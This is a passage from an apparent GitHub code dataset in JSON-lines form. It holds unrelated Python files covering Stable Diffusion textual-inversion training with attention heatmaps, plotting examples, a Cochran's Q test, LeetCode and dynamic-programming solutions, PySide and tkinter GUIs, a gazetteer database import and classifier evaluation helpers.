TextualInversionDataset(Dataset):\n def __init__(\n self,\n data_root,\n tokenizer,\n learnable_property=\"object\", # [object, style]\n size=512,\n repeats=100,\n interpolation=\"bicubic\",\n flip_p=0.5,\n set=\"train\",\n placeholder_token=\"*\",\n center_crop=False,\n ):\n\n self.data_root = data_root\n self.tokenizer = tokenizer\n self.learnable_property = learnable_property\n self.size = size\n self.placeholder_token = placeholder_token\n self.center_crop = center_crop\n self.flip_p = flip_p\n\n self.image_paths = [os.path.join(self.data_root, file_path) for file_path in os.listdir(self.data_root)]\n\n self.num_images = len(self.image_paths)\n self._length = self.num_images\n\n if set == \"train\":\n self._length = self.num_images * repeats\n\n self.interpolation = {\n \"linear\": PIL.Image.LINEAR,\n \"bilinear\": PIL.Image.BILINEAR,\n \"bicubic\": PIL.Image.BICUBIC,\n \"lanczos\": PIL.Image.LANCZOS,\n }[interpolation]\n\n self.templates = imagenet_style_templates_small if learnable_property == \"style\" else imagenet_templates_small\n self.flip_transform = transforms.RandomHorizontalFlip(p=self.flip_p)\n\n def __len__(self):\n return self._length\n\n def __getitem__(self, i):\n example = {}\n image = Image.open(self.image_paths[i % self.num_images])\n\n if not image.mode == \"RGB\":\n image = image.convert(\"RGB\")\n\n placeholder_string = self.placeholder_token\n text = random.choice(self.templates).format(placeholder_string)\n\n example[\"input_ids\"] = self.tokenizer(\n text,\n padding=\"max_length\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n return_tensors=\"pt\",\n ).input_ids[0]\n\n # default to score-sde preprocessing\n img = np.array(image).astype(np.uint8)\n\n if self.center_crop:\n crop = min(img.shape[0], img.shape[1])\n h, w, = (\n img.shape[0],\n img.shape[1],\n )\n img = img[(h - crop) // 2: (h + crop) // 2, (w - crop) // 2: (w + crop) // 2]\n\n image = Image.fromarray(img)\n image = image.resize((self.size, self.size), resample=self.interpolation)\n\n image = self.flip_transform(image)\n image = np.array(image).astype(np.uint8)\n image = (image / 127.5 - 1.0).astype(np.float32)\n\n example[\"pixel_values\"] = torch.from_numpy(image).permute(2, 0, 1)\n return example\n\n\n# Setup the model\n\n# Load the tokenizer and add the 
placeholder token as a additional special token.\ntokenizer = CLIPTokenizer.from_pretrained(\n pretrained_model_name_or_path,\n subfolder=\"tokenizer\",\n)\n\n# Add the placeholder token in tokenizer\nnum_added_tokens = tokenizer.add_tokens(placeholder_token)\nif num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {placeholder_token}. Please pass a different\"\n \" `placeholder_token` that is not already in the tokenizer.\"\n )\n\n# Get token ids for our placeholder and initializer token\n# Convert the initializer_token, placeholder_token to ids\ntoken_ids = tokenizer.encode(initializer_token, add_special_tokens=False)\n# Check if initializer_token is a single token or a sequence of tokens\nif len(token_ids) > 1:\n raise ValueError(\"The initializer token must be a single token.\")\n\ninitializer_token_id = token_ids[0]\nplaceholder_token_id = tokenizer.convert_tokens_to_ids(placeholder_token)\n\n# Load the Stable Diffusion model, here we obtain the main pre-trained components of the diffusion model\ntext_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\"\n)\nvae = AutoencoderKL.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"vae\"\n)\nunet = UNet2DConditionModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"unet\"\n)\n\n# We have added the placeholder_token in the tokenizer so we resize the \n# token embeddings here this will a new embedding vector in the token embeddings\n# for our placeholder_token\ntext_encoder.resize_token_embeddings(len(tokenizer))\n\n\n# Initialize the newly added placeholder token with the embeddings of the initializer token\ntoken_embeds = text_encoder.get_input_embeddings().weight.data\ntoken_embeds[placeholder_token_id] = token_embeds[initializer_token_id]\n\n# Freeze rest of the model parameters here since we are only training the text\n# encoder\ndef freeze_params(params):\n \"\"\"\n Freezes the parameters in the models so the weights are not changed while\n training\n \"\"\"\n for param in params:\n param.requires_grad = False\n\n\n# Freeze vae and unet and encoder parameters\nfreeze_params(vae.parameters())\nfreeze_params(unet.parameters())\nparams_to_freeze = itertools.chain(\n text_encoder.text_model.encoder.parameters(),\n text_encoder.text_model.final_layer_norm.parameters(),\n text_encoder.text_model.embeddings.position_embedding.parameters(),\n)\nfreeze_params(params_to_freeze)\n\n# Create our training data\ntrain_dataset = TextualInversionDataset(\n data_root=save_path,\n tokenizer=tokenizer,\n size=vae.sample_size,\n placeholder_token=placeholder_token,\n repeats=100,\n learnable_property=what_to_teach,\n center_crop=False,\n set=\"train\",\n)\n\n\ndef create_dataloader(train_batch_size=1):\n return torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True)\n\n\n# Create noise_scheduler for training\nnoise_scheduler = DDPMScheduler.from_config(pretrained_model_name_or_path, subfolder=\"scheduler\")\n\n# Training\n# Define hyperparameters for our training\n# Setting up all training args\nhyperparameters = {\n \"learning_rate\": 1e-06,\n \"scale_lr\": True,\n \"max_train_steps\": 1200,\n \"save_steps\": 250,\n \"train_batch_size\": 2,\n \"gradient_accumulation_steps\": 1,\n \"gradient_checkpointing\": True,\n \"mixed_precision\": \"fp16\",\n \"seed\": 42,\n \"output_dir\": \"new-concept\"\n}\n\n# Training function\nlogger = get_logger(__name__)\n\n\ndef save_progress(text_encoder, placeholder_token_id, 
accelerator, save_path):\n \"\"\"\n Shows the progress and what step in training the model is in.\n \"\"\"\n logger.info(\"Saving embeddings\")\n learned_embeds = accelerator.unwrap_model(text_encoder).get_input_embeddings().weight[placeholder_token_id]\n learned_embeds_dict = {placeholder_token: learned_embeds.detach().cpu()}\n torch.save(learned_embeds_dict, save_path)\n\n\ndef training_function(text_encoder, vae, unet):\n \"\"\"\n Runs training on the diffusion model. The text encoder is the main component\n being trained here. We go through multiple iterations while using prompts\n that encode the new concept being learned to guide the model to associate\n the visual markers in the training images to the text in the prompt.\n \"\"\"\n train_batch_size = hyperparameters[\"train_batch_size\"]\n gradient_accumulation_steps = hyperparameters[\"gradient_accumulation_steps\"]\n learning_rate = hyperparameters[\"learning_rate\"]\n max_train_steps = hyperparameters[\"max_train_steps\"]\n output_dir = hyperparameters[\"output_dir\"]\n gradient_checkpointing = hyperparameters[\"gradient_checkpointing\"]\n\n accelerator = Accelerator(\n gradient_accumulation_steps=gradient_accumulation_steps,\n mixed_precision=hyperparameters[\"mixed_precision\"],\n )\n\n if gradient_checkpointing:\n text_encoder.gradient_checkpointing_enable()\n unet.enable_gradient_checkpointing()\n\n train_dataloader = create_dataloader(train_batch_size)\n\n if hyperparameters[\"scale_lr\"]:\n learning_rate = (\n learning_rate * gradient_accumulation_steps * train_batch_size * accelerator.num_processes\n )\n\n # Initialize the optimizer\n optimizer = torch.optim.AdamW(\n text_encoder.get_input_embeddings().parameters(), # only optimize the embeddings\n lr=learning_rate,\n )\n\n text_encoder, optimizer, train_dataloader = accelerator.prepare(\n text_encoder, optimizer, train_dataloader\n )\n\n # weight_dtype = torch.float32\n # if accelerator.mixed_precision == \"fp16\":\n # weight_dtype = torch.float16\n # elif accelerator.mixed_precision == \"bf16\":\n # weight_dtype = torch.bfloat16\n\n # Move vae and unet to device\n # vae.to(accelerator.device, dtype=weight_dtype)\n # unet.to(accelerator.device, dtype=weight_dtype)\n vae.to(accelerator.device)\n unet.to(accelerator.device)\n\n # Keep vae in eval mode\n vae.eval()\n # Keep unet in train mode to enable gradient checkpointing\n unet.train()\n\n # We need to recalculate our total training steps as the size of the training dataloader may have changed.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / gradient_accumulation_steps)\n num_train_epochs = math.ceil(max_train_steps / num_update_steps_per_epoch)\n\n total_batch_size = train_batch_size * accelerator.num_processes * gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Instantaneous batch size per device = {train_batch_size}\")\n logger.info(f\" Total train batch size (w. 
parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {max_train_steps}\")\n # Only show the progress bar once on each machine.\n progress_bar = tqdm(range(max_train_steps), disable=not accelerator.is_local_main_process)\n progress_bar.set_description(\"Steps\")\n global_step = 0\n\n # Set seeding for the training and daam generation\n set_seed(0)\n torch.manual_seed(0)\n gen = daam.set_seed(0)\n\n for epoch in range(num_train_epochs):\n text_encoder.train()\n for step, batch in enumerate(train_dataloader):\n with accelerator.accumulate(text_encoder):\n # Convert images to latent space\n # latents = vae.encode(batch[\"pixel_values\"].to(dtype=weight_dtype)).latent_dist.sample().detach()\n latents = vae.encode(batch[\"pixel_values\"]).latent_dist.sample().detach()\n latents = latents * 0.18215\n\n # Sample noise that we'll add to the latents\n noise = torch.randn_like(latents)\n bsz = latents.shape[0]\n # Sample a random timestep for each image\n timesteps = torch.randint(0, noise_scheduler.num_train_timesteps, (bsz,), device=latents.device).long()\n\n # Add noise to the latents according to the noise magnitude at each timestep\n # (this is the forward diffusion process)\n noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps)\n\n # Get the text embedding for conditioning\n encoder_hidden_states = text_encoder(batch[\"input_ids\"])[0]\n\n # Predict the noise residual\n # noise_pred = unet(noisy_latents, timesteps, encoder_hidden_states.to(weight_dtype)).sample\n noise_pred = unet(noisy_latents, timesteps, encoder_hidden_states).sample\n\n loss = F.mse_loss(noise_pred, noise, reduction=\"none\").mean([1, 2, 3]).mean()\n accelerator.backward(loss)\n\n # Zero out the gradients for all token embeddings except the newly added\n # embeddings for the concept, as we only want to optimize the concept embeddings\n if accelerator.num_processes > 1:\n grads = text_encoder.module.get_input_embeddings().weight.grad\n else:\n grads = text_encoder.get_input_embeddings().weight.grad\n # Get the index for tokens that we want to zero the grads for\n index_grads_to_zero = torch.arange(len(tokenizer)) != placeholder_token_id\n grads.data[index_grads_to_zero, :] = grads.data[index_grads_to_zero, :].fill_(0)\n\n optimizer.step()\n optimizer.zero_grad()\n\n # Checks if the accelerator has performed an optimization step behind the scenes\n if accelerator.sync_gradients:\n progress_bar.update(1)\n global_step += 1\n if global_step % hyperparameters[\"save_steps\"] == 0:\n save_path = os.path.join(output_dir, f\"learned_embeds-step-{global_step}.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n logs = {\"loss\": loss.detach().item()}\n progress_bar.set_postfix(**logs)\n\n # Every 10 global iterations we observe the attribution map for the new object being trained\n if global_step % 50 == 0 or global_step <= 5:\n # Set up pipeline for text to image inference\n pipe = StableDiffusionPipeline.from_pretrained(\n pretrained_model_name_or_path,\n text_encoder=accelerator.unwrap_model(text_encoder),\n tokenizer=tokenizer,\n vae=vae,\n unet=unet,\n )\n pipe.save_pretrained(output_dir)\n # Also save the newly trained embeddings\n save_path = os.path.join(output_dir, f\"learned_embeds.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n # Display and save DAAM\n pipe.to(\"cuda\")\n file_name = \"images/\" + 
initializer_token + str(global_step) + \".png\"\n prompt = \"\"\n with torch.cuda.amp.autocast(dtype=torch.float16), torch.no_grad():\n with trace(pipe) as tc:\n out = pipe(prompt, num_inference_steps=30, generator=gen)\n heat_map = tc.compute_global_heat_map(prompt)\n heat_map = heat_map.compute_word_heat_map(\"\")\n heat_map.plot_overlay(out.images[0])\n # Show image\n plt.title(placeholder_token)\n plt.savefig(file_name)\n plt.show()\n del pipe\n\n if global_step >= max_train_steps:\n break\n\n accelerator.wait_for_everyone()\n\n # Create the pipeline and save the model\n if accelerator.is_main_process:\n pipe = StableDiffusionPipeline.from_pretrained(\n pretrained_model_name_or_path,\n text_encoder=accelerator.unwrap_model(text_encoder),\n tokenizer=tokenizer,\n vae=vae,\n unet=unet,\n )\n pipe.save_pretrained(output_dir)\n # Also save the newly trained embeddings\n save_path = os.path.join(output_dir, f\"learned_embeds.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n\nimport accelerate\n\naccelerate.notebook_launcher(training_function, args=(text_encoder, vae, unet))\n\nfor param in itertools.chain(unet.parameters(), text_encoder.parameters()):\n if param.grad is not None:\n del param.grad # free some memory\n torch.cuda.empty_cache()\n\n# Testing the Trained Model with the New Style\n\n# Set up the model pipeline so we can input prompts for image generation\npipe = StableDiffusionPipeline.from_pretrained(\n hyperparameters[\"output_dir\"],\n # \"downloaded_embedding\",\n torch_dtype=torch.float16,\n force_download=True,\n).to(\"cuda\")\n\n# Run the Stable Diffusion pipeline\nprompt = \"Tree in the style of \" # @param {type:\"string\"}\nnum_samples = 2\nnum_rows = 1\n\nall_images = []\nfor _ in range(num_rows):\n images = pipe([prompt] * num_samples, num_inference_steps=50, guidance_scale=7.5).images\n all_images.extend(images)\n\ngrid = image_grid(all_images, num_rows, num_samples)\n\n# Display Generated Image with the Heatmap for Style Association\nprompt = \"tree in the style of \"\ngen = daam.set_seed(0)\nwith torch.cuda.amp.autocast(dtype=torch.float16), torch.no_grad():\n with trace(pipe) as tc:\n out = pipe(prompt, num_inference_steps=30, generator=gen)\n heat_map = tc.compute_global_heat_map(prompt)\n heat_map = heat_map.compute_word_heat_map(\"\")\n heat_map.plot_overlay(out.images[0])\n # Show image\n plt.title(placeholder_token)\n plt.show()\n","repo_name":"VikramBharadwaj1995/analysis-diffusion","sub_path":"new_style_daam.py","file_name":"new_style_daam.py","file_ext":"py","file_size_in_byte":21446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35194976108","text":"# http://www.scipy.org/Cookbook/Matplotlib/Maps\n\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport numpy as np\n# set up orthographic map projection with\n# perspective of satellite looking down at 50N, 100W.\n# use low resolution coastlines.\n# don't plot features that are smaller than 1000 square km.\nmap = Basemap(projection='ortho',lat_0=50,lon_0=-100,\n resolution='l',area_thresh=1000.)\n# draw coastlines, country boundaries, fill continents.\nmap.drawcoastlines()\nmap.drawcountries()\nmap.fillcontinents(color='coral')\n# draw the edge of the map projection region (the projection limb)\nmap.drawmapboundary()\n# draw lat/lon grid lines every 30 
degrees.\nmap.drawmeridians(np.arange(0,360,30))\nmap.drawparallels(np.arange(-90,90,30))\nplt.show()\n","repo_name":"ContinuumIO/anaconda-recipes","sub_path":"basemap/cookbook.py","file_name":"cookbook.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"3"} +{"seq_id":"7786248614","text":"\"\"\" Conversion for Cochran-Test \"\"\"\n\n# author:\tThomas Haslwanter\n# date:\t\tJune-2022\n\n# Import the standard packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy import stats\nimport pingouin as pg\nfrom statsmodels.stats.contingency_tables import cochrans_q\n\n\ndef cochran_matrix_2_events(in_mat: np.ndarray) -> pd.DataFrame:\n \"\"\"Convert a 0/1-matrix to corresponding events\n\n Parameters\n ----------\n in_mat : matrix, with the events for each category in row-form\n\n Returns\n -------\n df : DataFrame, with columns ['subject', 'category', 'value']\n\n \"\"\"\n\n out = np.nan * np.ones((1, 3)) # Dummy-value for initiation output-matrix\n\n subjects = np.arange(in_mat.shape[1])\n categories = np.arange(in_mat.shape[0])\n\n for ii in categories:\n new = np.column_stack( (subjects, ii*np.ones(len(subjects)),\n in_mat[ii,:]) )\n out = np.vstack( (out, new) )\n\n out = out[1:,:] # Eliminate the dummy init-row\n\n df = pd.DataFrame(out, columns=['subject', 'category', 'value'])\n return df\n\n\nif __name__ == '__main__':\n\n # Dummy data\n tasks = np.array([[0,1,1,0,1,0,0,1,0,0,0,0],\n [1,1,1,0,0,1,0,1,1,1,1,1],\n [0,0,1,0,0,1,0,0,0,0,0,0]])\n\n\n # Calculate with statsmodels\n df = pd.DataFrame(tasks.T, columns = ['Task1', 'Task2', 'Task3'])\n sm_results = cochrans_q(df)\n\n print('\\nStatsmodels: --------------------------')\n print(dir(sm_results))\n print(sm_results.Q)\n\n # Calculate with pingouin\n df_pg = cochran_matrix_2_events(tasks)\n pg_out = pg.cochran(df_pg, dv='value', within='category', subject='subject')\n\n print('\\nPingouin: --------------------------')\n print(pg_out)\n","repo_name":"thomas-haslwanter/statsintro-python-2e","sub_path":"src/code_quantlets/09_TestsCategoricalData/compGroups/cochran.py","file_name":"cochran.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"74674717842","text":"class Solution:\n def pushDominoes(self, dominoes: str) -> str:\n state = [ d for d in dominoes ]\n left = set([ i for i, d in enumerate(dominoes) if d == \"L\" ])\n right = set([ i for i, d in enumerate(dominoes) if d == \"R\" ])\n\n while right or left:\n nextright = set()\n for r in right:\n if r + 1 in left:\n left.discard(r + 1)\n continue\n if r + 2 in left:\n left.discard(r + 2)\n continue\n if r + 1 not in right and r + 1 < len(state) and state[r + 1] == \".\":\n nextright.add(r + 1)\n state[r + 1] = \"R\"\n\n nextleft = set()\n for l in left:\n if l - 1 not in left and l > 0 and state[l - 1] == \".\":\n nextleft.add(l - 1)\n state[l - 1] = \"L\"\n\n left = nextleft\n right = nextright\n\n return \"\".join(state)\n","repo_name":"stbrumme/leetcode","sub_path":"0838.py","file_name":"0838.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42813284839","text":"from typing import List\n\n\nclass Solution:\n def numSquares(self, n: int) -> int:\n dp = [float('inf')] * (n+1)\n dp[0] = 0\n for i in range(n+1):\n j = 1\n while i + j * j <= n:\n dp[i + j * 
j] = min(dp[i + j * j], dp[i] + 1)\n j += 1\n return dp[-1]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.numSquares(12)\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Medium/279. Perfect Squares/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30981820098","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\n# 画面上部のDescription\nclass TopDescriptionWidget(QWidget):\n # def __init__(self, parent=None, text):\n def __init__(self, parent=None):\n super(TopDescriptionWidget, self).__init__(parent)\n self.text = \"test\"\n\n self.title_label = QLabel(\"
Description
\")\n self.details_label = QLabel(self.text)\n\n layout = QVBoxLayout()\n layout.addWidget(self.title_label)\n layout.addWidget(self.details_label) \n self.setLayout(layout)\n\n def setDetails(self, text):\n self.details_label.setText(text) \n\n# Pause / CF 分岐ボタンwidget\nclass BranchButtonBoxWidget(QWidget):\n def __init__(self, parent=None):\n super(BranchButtonBoxWidget, self).__init__(parent)\n\n self.pause_analyzer_button = QPushButton(\"Pause Analyzer\", parent=self)\n self.cf_analyzer_button = QPushButton(\"CF Analyzer\", parent=self)\n\n layout = QHBoxLayout()\n layout.addWidget(self.pause_analyzer_button)\n layout.addWidget(self.cf_analyzer_button) \n self.setLayout(layout)\n\n# TOP 画面Widget\nclass TopWindowWidget(QWidget):\n def __init__(self, parent=None):\n super(TopWindowWidget, self).__init__(parent)\n\n self.layout = QVBoxLayout() \n self.branch_button_widget = BranchButtonBoxWidget()\n\n # test\n self.test_text = \"\"\n for i in range(5):\n self.test_text += \"ヾ(⌒(ノシ >ω<)ノシ ヾ(:3ノシヾ)ノシ ヾ(°ω。ヽ=ノ°ω。)ノ ヾ(⌒(ノシ >ω<)ノシ ジタバタ ヾ(:3ノシヾ)ノシ三ヾ(ノシヾε:)ノ (ノシ>△<)ノシ _(⌒ノシ 'ω')ノシ ヾ(⌒(ノ'ω')ノ \\n\" \n #test\n\n self.description_widget = TopDescriptionWidget()\n self.description_widget.setDetails(self.test_text)\n\n self.layout.addWidget(self.description_widget)\n self.layout.addWidget(self.branch_button_widget)\n\n self.setLayout(self.layout) \n\n# def clearAllWidgets():\n# for i in reversed(range(layout.count())):\n# layout.itemAt(i).widget().setParent(None)\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setWindowTitle(\"Main Window\")\n # self.setFixedSize(800, 250)\n # self.status_bar.showMessage(\"Main Window\")\n\n # top window\n self.top_window_widget = TopWindowWidget()\n self.setCentralWidget(self.top_window_widget)\n\n def changeWindwoWidget(self, window_widget):\n self.setCentralWidget(window_widget)\n\ndef main(): \n app = QApplication(sys.argv)\n \n # 日本語設定.\n QTextCodec.setCodecForCStrings(QTextCodec.codecForLocale()) \n\n main_window = MainWindow()\n main_window.show()\n\n sys.exit(app.exec_()) \n\nif __name__ == '__main__': \n main() \n \n","repo_name":"mimaun/CF-Analyzer","sub_path":"codes/top_widget.py","file_name":"top_widget.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23819124906","text":"'''\nProblem statement-\nGiven a chain of matrices A1, A2, A3,.....An, we have to figure out the most efficient way to multiply these matrices. In other words, determine where to place parentheses to minimize the number of multiplications.\n\nYou will be given an array p[] of size n + 1. Dimension of matrix Ai is p[i - 1]*p[i]. You will have to find the minimum number of multiplications needed to multiply the chain.\n\nLogical Intuition-\nWe place out paranthesis in all possible positions and calculate the cost to multiply the matrices. 
We will store them in the array 'dp'.\nThen we will choose the minimum cost required to multiply the matrices.\n'''\n\n\nimport sys\n\n\ndef mcm(arr, i, j, dp):\n '''\n Summary line:\n This function helps us to find the minimum cost\n required to multiply matrices.\n\n Args:\n arr: array of dimensions of matrices\n i: starting index of arr\n j: length of arr\n dp: python list used for memoization\n\n Returns:\n Minimum cost to multiply.\n\n '''\n if i >= j: #base case\n return 0\n ans = sys.maxsize\n for k in range(i, j):\n if dp[i][k] != -1:\n ans1 = dp[i][k]\n else:\n ans1 = mcm(arr, i, k, dp)\n dp[i][k] = ans1\n if dp[k+1][j] != -1:\n ans2 = dp[k+1][j]\n else:\n ans2 = mcm(arr, k+1, j, dp)\n dp[k+1][j] = ans2\n ans3 = arr[i-1]*arr[k]*arr[j] #calculating the cost\n cost = ans1+ans2+ans3 #taking sum of cost calculated for a particular position of paranthesis\n ans = min(ans, cost) # returning the min cost\n return ans\n\nif __name__ == \"__main__\":\n n = int(input())\n arr = [int(i) for i in input().split()]\n dp = [[-1 for j in range(n+1)]for i in range(n+1)] #initalizing dp array of size nXn with -1\n print(mcm(arr, 1, n, dp))\n\n\n'''\nSample input-\n3\n10 15 20 25\n\nSample output-\n8000\n'''\n","repo_name":"HarshCasper/NeoAlgo","sub_path":"Python/dp/Matrix-Chain-Multiplication.py","file_name":"Matrix-Chain-Multiplication.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"3"} +{"seq_id":"41882326865","text":"\"\"\"\nMenu Bar\nWritten by Joshua Kitchen - 2023\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import filedialog, colorchooser\nfrom pathlib import Path\n\nfrom gui.connect_dialog import ConnectDialog\n\n\nclass MenuBar(tk.Menu):\n def __init__(self, parent, parent_font, notification_sound):\n tk.Menu.__init__(self)\n self.parent = parent\n self.file_menu = tk.Menu(self.parent, tearoff=0)\n self.edit_menu = tk.Menu(self.parent, tearoff=0)\n self.connect_menu = tk.Menu(self.parent, tearoff=0)\n self.options_menu = tk.Menu(self.parent, tearoff=0)\n self.font_menu = tk.Menu(self.parent, tearoff=0)\n self.sound_menu = tk.Menu(self.parent, tearoff=0)\n\n self.file_menu.add_command(label=\"Clear chat\", command=self.parent._clear_chat_box, accelerator=\"Ctrl+Del\")\n self.file_menu.add_command(label=\"Archive chat\", command=self.archive_chat, accelerator=\"Ctrl+S\")\n self.edit_menu.add_command(label=\"Copy\", command=self.copy, accelerator=\"Ctrl+C\")\n self.edit_menu.add_command(label=\"Cut\", command=lambda: self.parent.user_input.event_generate('<>'),\n accelerator=\"Ctrl+X\")\n self.edit_menu.add_command(label=\"Paste\", command=lambda: self.parent.user_input.event_generate('<>'),\n accelerator=\"Ctrl+V\")\n self.connect_menu.add_command(label=\"Connect to new chatroom\", command=self.connect_to_room,\n accelerator=\"Ctrl+N\")\n self.connect_menu.add_command(label=\"Disconnect from chatroom\", command=self.disconnect_from_room,\n accelerator=\"Ctrl+End\")\n self.options_menu.add_command(label=\"Increase font size\", command=self.parent.increase_font_size,\n accelerator=\"Ctrl+Up Arrow\")\n self.options_menu.add_command(label=\"Decrease font size\", command=self.parent.decrease_font_size,\n accelerator=\"Ctrl+Down Arrow\")\n self.options_menu.add_cascade(label=\"Change font\", menu=self.font_menu)\n self.options_menu.add_cascade(label=\"Change Notification Sound\", menu=self.sound_menu)\n self.options_menu.add_command(label=\"Change background color\", command=self.change_bg)\n\n 
self.font_radio_var = tk.IntVar()\n self.notification_radio_var = tk.IntVar()\n\n for i, font in enumerate(self.parent.fonts):\n self.font_menu.add_radiobutton(label=font, var=self.font_radio_var, value=i,\n command=lambda f=font: self.parent.change_font(f))\n if font == parent_font:\n self.font_radio_var.set(i)\n\n for i, sound in enumerate(self.parent.notification_sounds):\n self.sound_menu.add_radiobutton(label=sound[1], var=self.notification_radio_var, value=i,\n command=lambda f=sound[0]: self.parent.set_notification_sound(f))\n if sound[0] == notification_sound:\n self.notification_radio_var.set(i)\n\n self.add_cascade(menu=self.file_menu, label=\"File\")\n self.add_cascade(menu=self.edit_menu, label=\"Edit\")\n self.add_cascade(menu=self.options_menu, label=\"Options\")\n self.add_cascade(menu=self.connect_menu, label=\"Connect\")\n\n def archive_chat(self, *args):\n chat_text = self.parent.chat_box.get(0.0, tk.END)\n chosen_filepath = filedialog.asksaveasfilename(filetypes=[('All', '*'), ('.txt', '*.txt')],\n initialdir=Path.home())\n if chosen_filepath == () or chosen_filepath == '':\n return\n with open(chosen_filepath, 'a+') as file:\n file.write(chat_text)\n\n def copy(self, *args):\n widget = self.parent.focus_get()\n if widget is self.parent.chat_box or widget is self.parent.user_input:\n widget.event_generate('<>')\n\n def change_bg(self):\n color = colorchooser.askcolor()\n if color is None:\n return\n self.parent.app_bg = color[1]\n self.parent.chat_area_frame.configure(background=self.parent.app_bg)\n self.parent.input_frame.configure(background=self.parent.app_bg)\n\n def connect_to_room(self, *args):\n self.parent.disconnect()\n window = tk.Toplevel()\n ConnectDialog(window, self.parent)\n\n def disconnect_from_room(self, *args):\n self.parent.disconnect()\n","repo_name":"kitchej/pychat","sub_path":"client/gui/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41908064706","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# the points for generating the velocity field\ny,x = np.mgrid[-3:3:100j,-3:3:100j]\n\n# the initial conditions for generating stream lines\n# provided as an array of points in the plane\nxcoords = np.linspace(-3,3,22,endpoint=True)\nycoords = np.zeros_like(xcoords)\nstrmpts = np.array(zip(xcoords, ycoords))\n\nu = 0.5*y\nv = -8*x\n\nplt.streamplot(x, y, u, v, start_points=strmpts, density=35)\nplt.show()\n","repo_name":"jme2103/visualization-tools","sub_path":"stream-plots.py","file_name":"stream-plots.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30713578762","text":"import sys\nimport psycopg2\nimport re\n\nconn = psycopg2.connect(\"dbname=gazetteers\")\ncursor = conn.cursor()\nwith open(\"gov-data_PL.txt\") as f:\n for line in f:\n attrs = re.split(r'\\t', line)\n try: float(attrs[11])\n except ValueError: attrs[11] = 0.0\n try: float(attrs[12])\n except ValueError: attrs[12] = 0.0\n query = \"INSERT INTO gov (govid, type, typeid, curname, lastgername, state, adm1, adm2, adm3, adm4, postalcode, lat, lon) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n cursor.execute(query, 
attrs)\nconn.commit()\ncursor.close()\nconn.close()\n","repo_name":"heinmade/gazetteers.net-server","sub_path":"db/data/gov_to_db.py","file_name":"gov_to_db.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12910470037","text":"from training_tuning import *\n\ndef predict_tree(X_train, Y_train, X_test, Y_test, depth):\n \"\"\" This function fit the DT model with all training data for test set (first\n 10 data points) output the final prediction.\n\n Report the final prediction in order.\n Report the actual results\n \"\"\"\n # Choose max_depth=13, build appropriate classifier\n dtree = tree.DecisionTreeClassifier(max_depth=depth)\n\n # fit the model\n dtree.fit(X_train, Y_train)\n print(\"\\nCreated and trained a DT classifier\") #, knn\n\n pred = dtree.predict(X_test)\n\n # Report the features importances\n print(\"\\nFeature Importance of DT:\")\n print(dtree.feature_importances_)\n\n count = 0\n total_error = 0\n for i in range(len(pred)):\n guess = pred[i]\n true = Y_test[i]\n if guess == true:\n count += 1\n\n error_sq = (guess-true)**2\n total_error += error_sq\n\n MSE = float(total_error / len(Y_test))\n\n print(\"\\nThe total number of review we are testing is:\", len(Y_test))\n print(\"The total number of correct predict using current DT classifier is:\", count)\n print(\"The mean square error is:\", MSE)\n\n return dtree\n\n\ndef predict_knn(X_train, Y_train, X_test, Y_test, neighbors):\n \"\"\" This function fit the DT model with all training data for test set (first\n 10 data points) output the final prediction.\n\n Report the final prediction in order.\n Report the actual results\n \"\"\"\n # Choose max_depth=13, build appropriate classifier\n knn = KNeighborsClassifier(n_neighbors=neighbors)\n\n # fit the model\n knn.fit(X_train, Y_train)\n print(\"\\nCreated and trained a KNN classifier\") #, 